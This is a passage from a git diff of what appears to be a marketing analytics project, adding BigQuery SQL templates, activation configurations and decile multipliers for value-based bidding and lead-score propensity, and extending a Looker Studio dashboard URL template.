b.user_pseudo_id AS client_id, + b.user_id AS user_id, + b.ga_session_id AS session_id, + CASE + WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp + ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) + END AS inference_date + FROM + `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_24_hours` b, + `{{source_table}}` a + WHERE + COALESCE(a.user_id, "") = COALESCE(b.user_id, "") + AND a.user_pseudo_id = b.user_pseudo_id) +SELECT + a.p_p_prediction AS user_prop_p_p_prediction, + a.p_p_decile AS user_prop_p_p_decile, + b.value AS event_param_value, + 'USD' AS event_param_currency, + a.client_id, + a.user_id, + a.session_id AS event_param_session_id, + a.inference_date +FROM + user_prediction_decile AS a +LEFT JOIN + `${activation_project_id}.${dataset}.vbb_activation_configuration` AS b +ON + a.p_p_decile = b.decile +WHERE + b.activation_type = 'purchase-propensity' +AND b.value > 0 \ No newline at end of file diff --git a/templates/activation_type_configuration_template.tpl b/templates/activation_type_configuration_template.tpl index 22afddc3..913b70a2 100644 --- a/templates/activation_type_configuration_template.tpl +++ b/templates/activation_type_configuration_template.tpl @@ -1,47 +1,54 @@ { "audience-segmentation-15": { "activation_event_name": "maj_audience_segmentation_15", - "source_query_template": "${audience_segmentation_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${audience_segmentation_query_template_gcs_path}" }, "auto-audience-segmentation-15": { "activation_event_name": "maj_auto_audience_segmentation_15", - "source_query_template": "${auto_audience_segmentation_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${auto_audience_segmentation_query_template_gcs_path}" }, "cltv-180-180": { "activation_event_name": "maj_cltv_180_180", - "source_query_template": "${cltv_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${cltv_query_template_gcs_path}" }, "cltv-180-90": { "activation_event_name": "maj_cltv_180_90", - "source_query_template": "${cltv_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${cltv_query_template_gcs_path}" }, "cltv-180-30": { "activation_event_name": "maj_cltv_180_30", - "source_query_template": "${cltv_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${cltv_query_template_gcs_path}" }, "purchase-propensity-30-15": { "activation_event_name": "maj_purchase_propensity_30_15", - "source_query_template": "${purchase_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${purchase_propensity_query_template_gcs_path}" + }, + "purchase-propensity-vbb-30-15": { + "activation_event_name": "maj_purchase_propensity_vbb_30_15", + "source_query_template": "${purchase_propensity_vbb_query_template_gcs_path}" }, "purchase-propensity-15-15": { "activation_event_name": "maj_purchase_propensity_15_15", - "source_query_template": "${purchase_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${purchase_propensity_query_template_gcs_path}" }, "purchase-propensity-15-7": { "activation_event_name": "maj_purchase_propensity_15_7", - "source_query_template": "${purchase_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${purchase_propensity_query_template_gcs_path}" }, "churn-propensity-30-15": { "activation_event_name": "maj_churn_propensity_30_15", - "source_query_template": "${churn_propensity_query_template_gcs_path}", - "measurement_protocol_payload_template": "${measurement_protocol_payload_template_gcs_path}" + "source_query_template": "${churn_propensity_query_template_gcs_path}" + }, + "churn-propensity-15-15": { + "activation_event_name": "maj_churn_propensity_15_15", + "source_query_template": "${churn_propensity_query_template_gcs_path}" + }, + "churn-propensity-15-7": { + "activation_event_name": "maj_churn_propensity_15_7", + "source_query_template": "${churn_propensity_query_template_gcs_path}" + }, + "lead-score-propensity-30-15": { + "activation_event_name": "maj_lead_score_propensity_30_15", + "source_query_template": "${lead_score_propensity_query_template_gcs_path}" } -} \ No newline at end of file +} diff --git a/templates/activation_user_import/lead_score_propensity_csv_export.sqlx b/templates/activation_user_import/lead_score_propensity_csv_export.sqlx new file mode 100644 index 00000000..376cea56 --- /dev/null +++ b/templates/activation_user_import/lead_score_propensity_csv_export.sqlx @@ -0,0 +1,27 @@ +DECLARE + select_query STRING; +SET + select_query = FORMAT(""" + CREATE TEMPORARY TABLE tmp_selection AS + SELECT + user_pseudo_id AS client_id, + '${ga4_stream_id}' AS stream_id, + prediction AS l_s_p_prediction, + NTILE(10) OVER (ORDER BY prediction_prob DESC) AS l_s_p_decile + FROM `%s` + """, prediction_table_name); +EXECUTE IMMEDIATE + select_query; +EXPORT DATA + OPTIONS ( uri = 'gs://${export_bucket}/csv-export/lead_score_propensity-*.csv', + format = 'CSV', + OVERWRITE = TRUE, + header = TRUE, + field_delimiter = ',' ) AS ( + SELECT + client_id, + stream_id, + l_s_p_prediction, + l_s_p_decile + FROM + tmp_selection ); diff --git a/templates/app_payload_template.jinja2 b/templates/app_payload_template.jinja2 deleted file mode 100644 index 33179784..00000000 --- a/templates/app_payload_template.jinja2 +++ /dev/null @@ -1,20 +0,0 @@ -{ - "client_id": "{{client_id}}", - {{user_id}} - "timestamp_micros": "{{event_timestamp}}", - "nonPersonalizedAds": false, - "consent": { - "ad_user_data": "GRANTED", - "ad_personalization": "GRANTED" - }, - "user_properties": - {{user_properties}}, - "events": [ - { - "name": "{{event_name}}", - "params": { - "session_id": "{{session_id}}" - } - } - ] -} diff --git a/templates/load_vbb_activation_configuration.sql.tpl b/templates/load_vbb_activation_configuration.sql.tpl new file mode 100644 index 00000000..b256e9ca --- /dev/null +++ b/templates/load_vbb_activation_configuration.sql.tpl @@ -0,0 +1,33 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- Step 1: Load JSON data from GCS into the temporary table +LOAD DATA OVERWRITE `${project_id}.${dataset}.temp_json_data` +FROM FILES ( + format = 'JSON', + uris = ['${config_file_uri}'] +); + +-- Step 2: Transform and load into the final table +CREATE OR REPLACE TABLE `${project_id}.${dataset}.vbb_activation_configuration` AS + SELECT + t.activation_type AS activation_type, + dm.decile, + (t.value_norm * dm.multiplier) AS value + FROM + `${project_id}.${dataset}.temp_json_data` AS t, + UNNEST(t.decile_multiplier) AS dm; + +-- Step 3: Clean up temporary tables +DROP TABLE `${project_id}.${dataset}.temp_json_data`; diff --git a/templates/looker_studio_create_dashboard_url_template.txt b/templates/looker_studio_create_dashboard_url_template.txt index 81eea9cb..5407bd49 100644 --- a/templates/looker_studio_create_dashboard_url_template.txt +++ b/templates/looker_studio_create_dashboard_url_template.txt @@ -1 +1 @@ -https://lookerstudio.google.com/reporting/create?c.reportId=${report_id}&c.explain=true&r.reportName=Marketing%20Analytics%20Sample&ds.GA4_sessions.connector=bigQuery&ds.GA4_sessions.type=TABLE&ds.GA4_sessions.tableId=session_date&ds.GA4_sessions.datasetId=${mds_ga4_product_dataset}&ds.GA4_sessions.projectId=${mds_project}&ds.GA4_sessions.datasourceName=MDS%20GA4%20Sessions&ds.GA4_session_device.connector=bigQuery&ds.GA4_session_device.type=TABLE&ds.GA4_session_device.tableId=session_device_daily_metrics&ds.GA4_session_device.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_device.projectId=${mds_project}&ds.GA4_session_device.datasourceName=MDS%20GA4%20Session%20Device&ds.GA4_session_location.connector=bigQuery&ds.GA4_session_location.type=TABLE&ds.GA4_session_location.tableId=session_location_daily_metrics&ds.GA4_session_location.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_location.projectId=${mds_project}&ds.GA4_session_location.datasourceName=MDS%20GA4%20Session%20Location&ds.GA4_event_page.connector=bigQuery&ds.GA4_event_page.type=TABLE&ds.GA4_event_page.tableId=event_page&ds.GA4_event_page.datasetId=${mds_ga4_product_dataset}&ds.GA4_event_page.projectId=${mds_project}&ds.GA4_event_page.datasourceName=MDS%20GA4%20Event%20Page&ds.GA4_unique_page_views.connector=bigQuery&ds.GA4_unique_page_views.type=TABLE&ds.GA4_unique_page_views.tableId=unique_page_views&ds.GA4_unique_page_views.datasetId=${mds_ga4_product_dataset}&ds.GA4_unique_page_views.projectId=${mds_project}&ds.GA4_unique_page_views.datasourceName=MDS%20GA4%20Unique%20Page%20Views&ds.GA4_page_session.connector=bigQuery&ds.GA4_page_session.type=TABLE&ds.GA4_page_session.tableId=page_session_daily_metrics&ds.GA4_page_session.datasetId=${mds_ga4_product_dataset}&ds.GA4_page_session.projectId=${mds_project}&ds.GA4_page_session.datasourceName=MDS%20GA4%20Page%20Session&ds.Ads_perf_conversions.connector=bigQuery&ds.Ads_perf_conversions.type=TABLE&ds.Ads_perf_conversions.tableId=ad_performance_conversions&ds.Ads_perf_conversions.datasetId=${mds_ads_product_dataset}&ds.Ads_perf_conversions.projectId=${mds_project}&ds.Ads_perf_conversions.datasourceName=MDS%20Ads%20Ad%20Performance%20x%20Conversions&ds.MAJ_resource_link.connector=bigQuery&ds.MAJ_resource_link.type=TABLE&ds.MAJ_resource_link.tableId=resource_link&ds.MAJ_resource_link.datasetId=maj_dashboard&ds.MAJ_resource_link.projectId=${monitor_project}&ds.MAJ_resource_link.datasourceName=MAJ%20Resource%20Link&ds.GA4_base_event.connector=bigQuery&ds.GA4_base_event.type=TABLE&ds.GA4_base_event.tableId=event&ds.GA4_base_event.datasetId=${mds_ga4_base_dataset}&ds.GA4_base_event.projectId=${mds_project}&ds.GA4_base_event.datasourceName=MDS%20GA4%20Base%20Event&ds.MDS_execution_log.connector=bigQuery&ds.MDS_execution_log.type=TABLE&ds.MDS_execution_log.tableId=${dataform_log_table_id}&ds.MDS_execution_log.datasetId=${logs_dataset}&ds.MDS_execution_log.projectId=${monitor_project}&ds.MDS_execution_log.datasourceName=MDS%20Execution%20Log&ds.Activation_log.connector=bigQuery&ds.Activation_log.type=TABLE&ds.Activation_log.tableId=${dataflow_log_table_id}&ds.Activation_log.datasetId=${logs_dataset}&ds.Activation_log.projectId=${monitor_project}&ds.Activation_log.datasourceName=Activation%20Execution%20Log&ds.Vertex_log.connector=bigQuery&ds.Vertex_log.type=TABLE&ds.Vertex_log.tableId=${vertex_pipelines_log_table_id}&ds.Vertex_log.datasetId=${logs_dataset}&ds.Vertex_log.projectId=${monitor_project}&ds.Vertex_log.datasourceName=Vertex%20AI%20Pipelines%20Log&ds.Aggregated_vbb_volume_daily.connector=bigQuery&ds.Aggregated_vbb_volume_daily.type=TABLE&ds.Aggregated_vbb_volume_daily.tableId=aggregated_value_based_bidding_volume_daily&ds.Aggregated_vbb_volume_daily.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_daily.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_daily.datasourceName=Aggregated%20VBB%20Volume%20Daily&ds.Aggregated_vbb_volume_weekly.connector=bigQuery&ds.Aggregated_vbb_volume_weekly.type=TABLE&ds.Aggregated_vbb_volume_weekly.tableId=aggregated_value_based_bidding_volume_weekly&ds.Aggregated_vbb_volume_weekly.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_weekly.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_weekly.datasourceName=Aggregated%20VBB%20Volume%20Weekly&ds.Aggregated_vbb_correlation.connector=bigQuery&ds.Aggregated_vbb_correlation.type=TABLE&ds.Aggregated_vbb_correlation.tableId=aggregated_value_based_bidding_correlation&ds.Aggregated_vbb_correlation.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_correlation.projectId=${feature_store_project}&ds.Aggregated_vbb_correlation.datasourceName=Aggregated%20VBB%20Correlation&ds.Aggregated_vbb_weights.connector=bigQuery&ds.Aggregated_vbb_weights.type=TABLE&ds.Aggregated_vbb_weights.tableId=vbb_weights&ds.Aggregated_vbb_weights.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_weights.projectId=${feature_store_project}&ds.Aggregated_vbb_weights.datasourceName=Aggregated%20VBB%20Weights&ds.Aggregated_predictions.connector=bigQuery&ds.Aggregated_predictions.type=TABLE&ds.Aggregated_predictions.tableId=latest&ds.Aggregated_predictions.datasetId=${aggregated_predictions_dataset}&ds.Aggregated_predictions.projectId=${feature_store_project}&ds.Aggregated_predictions.datasourceName=Aggregated%20Predictions&ds.User_behaviour_revenue_insights_daily.connector=bigQuery&ds.User_behaviour_revenue_insights_daily.type=TABLE&ds.User_behaviour_revenue_insights_daily.tableId=user_behaviour_revenue_insights_daily&ds.User_behaviour_revenue_insights_daily.datasetId=${gemini_insights_dataset}&ds.User_behaviour_revenue_insights_daily.projectId=${feature_store_project}&ds.User_behaviour_revenue_insights_daily.datasourceName=User%20Behaviour%20Revenue%20Insights%20Daily \ No newline at end of file +https://lookerstudio.google.com/reporting/create?c.reportId=${report_id}&c.explain=true&r.reportName=Marketing%20Analytics%20Sample&ds.GA4_sessions.connector=bigQuery&ds.GA4_sessions.type=TABLE&ds.GA4_sessions.tableId=session_date&ds.GA4_sessions.datasetId=${mds_ga4_product_dataset}&ds.GA4_sessions.projectId=${mds_project}&ds.GA4_sessions.datasourceName=MDS%20GA4%20Sessions&ds.GA4_session_device.connector=bigQuery&ds.GA4_session_device.type=TABLE&ds.GA4_session_device.tableId=session_device_daily_metrics&ds.GA4_session_device.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_device.projectId=${mds_project}&ds.GA4_session_device.datasourceName=MDS%20GA4%20Session%20Device&ds.GA4_session_location.connector=bigQuery&ds.GA4_session_location.type=TABLE&ds.GA4_session_location.tableId=session_location_daily_metrics&ds.GA4_session_location.datasetId=${mds_ga4_product_dataset}&ds.GA4_session_location.projectId=${mds_project}&ds.GA4_session_location.datasourceName=MDS%20GA4%20Session%20Location&ds.GA4_event_page.connector=bigQuery&ds.GA4_event_page.type=TABLE&ds.GA4_event_page.tableId=event_page&ds.GA4_event_page.datasetId=${mds_ga4_product_dataset}&ds.GA4_event_page.projectId=${mds_project}&ds.GA4_event_page.datasourceName=MDS%20GA4%20Event%20Page&ds.GA4_unique_page_views.connector=bigQuery&ds.GA4_unique_page_views.type=TABLE&ds.GA4_unique_page_views.tableId=unique_page_views&ds.GA4_unique_page_views.datasetId=${mds_ga4_product_dataset}&ds.GA4_unique_page_views.projectId=${mds_project}&ds.GA4_unique_page_views.datasourceName=MDS%20GA4%20Unique%20Page%20Views&ds.GA4_page_session.connector=bigQuery&ds.GA4_page_session.type=TABLE&ds.GA4_page_session.tableId=page_session_daily_metrics&ds.GA4_page_session.datasetId=${mds_ga4_product_dataset}&ds.GA4_page_session.projectId=${mds_project}&ds.GA4_page_session.datasourceName=MDS%20GA4%20Page%20Session&ds.Ads_perf_conversions.connector=bigQuery&ds.Ads_perf_conversions.type=TABLE&ds.Ads_perf_conversions.tableId=ad_performance_conversions&ds.Ads_perf_conversions.datasetId=${mds_ads_product_dataset}&ds.Ads_perf_conversions.projectId=${mds_project}&ds.Ads_perf_conversions.datasourceName=MDS%20Ads%20Ad%20Performance%20x%20Conversions&ds.MAJ_resource_link.connector=bigQuery&ds.MAJ_resource_link.type=TABLE&ds.MAJ_resource_link.tableId=resource_link&ds.MAJ_resource_link.datasetId=maj_dashboard&ds.MAJ_resource_link.projectId=${monitor_project}&ds.MAJ_resource_link.datasourceName=MAJ%20Resource%20Link&ds.GA4_base_event.connector=bigQuery&ds.GA4_base_event.type=TABLE&ds.GA4_base_event.tableId=event&ds.GA4_base_event.datasetId=${mds_ga4_base_dataset}&ds.GA4_base_event.projectId=${mds_project}&ds.GA4_base_event.datasourceName=MDS%20GA4%20Base%20Event&ds.MDS_execution_log.connector=bigQuery&ds.MDS_execution_log.type=TABLE&ds.MDS_execution_log.tableId=${dataform_log_table_id}&ds.MDS_execution_log.datasetId=${logs_dataset}&ds.MDS_execution_log.projectId=${monitor_project}&ds.MDS_execution_log.datasourceName=MDS%20Execution%20Log&ds.Activation_log.connector=bigQuery&ds.Activation_log.type=TABLE&ds.Activation_log.tableId=${dataflow_log_table_id}&ds.Activation_log.datasetId=${logs_dataset}&ds.Activation_log.projectId=${monitor_project}&ds.Activation_log.datasourceName=Activation%20Execution%20Log&ds.Vertex_log.connector=bigQuery&ds.Vertex_log.type=TABLE&ds.Vertex_log.tableId=${vertex_pipelines_log_table_id}&ds.Vertex_log.datasetId=${logs_dataset}&ds.Vertex_log.projectId=${monitor_project}&ds.Vertex_log.datasourceName=Vertex%20AI%20Pipelines%20Log&ds.Aggregated_vbb_volume_daily.connector=bigQuery&ds.Aggregated_vbb_volume_daily.type=TABLE&ds.Aggregated_vbb_volume_daily.tableId=aggregated_value_based_bidding_volume_daily&ds.Aggregated_vbb_volume_daily.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_daily.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_daily.datasourceName=Aggregated%20VBB%20Volume%20Daily&ds.Aggregated_vbb_volume_weekly.connector=bigQuery&ds.Aggregated_vbb_volume_weekly.type=TABLE&ds.Aggregated_vbb_volume_weekly.tableId=aggregated_value_based_bidding_volume_weekly&ds.Aggregated_vbb_volume_weekly.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_weekly.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_weekly.datasourceName=Aggregated%20VBB%20Volume%20Weekly&ds.Aggregated_vbb_correlation.connector=bigQuery&ds.Aggregated_vbb_correlation.type=TABLE&ds.Aggregated_vbb_correlation.tableId=aggregated_value_based_bidding_correlation&ds.Aggregated_vbb_correlation.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_correlation.projectId=${feature_store_project}&ds.Aggregated_vbb_correlation.datasourceName=Aggregated%20VBB%20Correlation&ds.Aggregated_vbb_weights.connector=bigQuery&ds.Aggregated_vbb_weights.type=TABLE&ds.Aggregated_vbb_weights.tableId=vbb_weights&ds.Aggregated_vbb_weights.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_weights.projectId=${feature_store_project}&ds.Aggregated_vbb_weights.datasourceName=Aggregated%20VBB%20Weights&ds.Aggregated_predictions.connector=bigQuery&ds.Aggregated_predictions.type=TABLE&ds.Aggregated_predictions.tableId=latest&ds.Aggregated_predictions.datasetId=${aggregated_predictions_dataset}&ds.Aggregated_predictions.projectId=${feature_store_project}&ds.Aggregated_predictions.datasourceName=Aggregated%20Predictions&ds.User_behaviour_revenue_insights_daily.connector=bigQuery&ds.User_behaviour_revenue_insights_daily.type=TABLE&ds.User_behaviour_revenue_insights_daily.tableId=user_behaviour_revenue_insights_daily&ds.User_behaviour_revenue_insights_daily.datasetId=${gemini_insights_dataset}&ds.User_behaviour_revenue_insights_daily.projectId=${feature_store_project}&ds.User_behaviour_revenue_insights_daily.datasourceName=User%20Behaviour%20Revenue%20Insights%20Daily&ds.Bid_strategy_roas_vbb.connector=bigQuery&ds.Bid_strategy_roas_vbb.type=TABLE&ds.Bid_strategy_roas_vbb.tableId=bid_strategy_roas&ds.Bid_strategy_roas_vbb.datasetId=${mds_ads_base_dataset}&ds.Bid_strategy_roas_vbb.projectId=${mds_project}&ds.Bid_strategy_roas_vbb.datasourceName=Bid%20Strategy%20ROAS%20VBB&ds.Prediction_stats.connector=bigQuery&ds.Prediction_stats.type=TABLE&ds.Prediction_stats.tableId=prediction_stats&ds.Prediction_stats.datasetId=${purchase_propensity_dataset}&ds.Prediction_stats.projectId=${feature_store_project}&ds.Prediction_stats.datasourceName=Prediction%20Stats \ No newline at end of file diff --git a/templates/purchase_propensity_smart_bidding_view.sql.tpl b/templates/purchase_propensity_smart_bidding_view.sql.tpl new file mode 100644 index 00000000..493a5e9b --- /dev/null +++ b/templates/purchase_propensity_smart_bidding_view.sql.tpl @@ -0,0 +1,41 @@ +-- Copyright 2024 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +SELECT + p_stat.inference_date, + p_stat.p_p_decile, + p_stat.number_of_users, + conf.value*p_stat.number_of_users AS predicted_purchase_value +FROM ( + SELECT + inference_date, + p_p_decile, + COUNT(p_p_decile) AS number_of_users + FROM ( + SELECT + PARSE_DATE('%Y_%m_%d', SUBSTR(_TABLE_SUFFIX, 1,10)) AS inference_date, + NTILE(10) OVER (PARTITION BY _TABLE_SUFFIX ORDER BY b.prediction_prob DESC) AS p_p_decile, + FROM + `${project_id}.${purchase_propensity_dataset}.predictions_*` b + WHERE + ENDS_WITH(_TABLE_SUFFIX, '_view') ) + GROUP BY + inference_date, + p_p_decile ) AS p_stat +JOIN + `${project_id}.${activation_dataset}.${smart_bidding_configuration_table}` conf +ON + p_stat.p_p_decile = decile +WHERE + conf.activation_type = 'purchase-propensity' \ No newline at end of file diff --git a/templates/vbb_activation_configuration.jsonl b/templates/vbb_activation_configuration.jsonl new file mode 100644 index 00000000..57b200e0 --- /dev/null +++ b/templates/vbb_activation_configuration.jsonl @@ -0,0 +1,3 @@ +{"activation_type":"purchase-propensity","value_norm":150,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} +{"activation_type":"cltv","value_norm":500,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} +{"activation_type":"lead-score-propensity","value_norm":150,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} \ No newline at end of file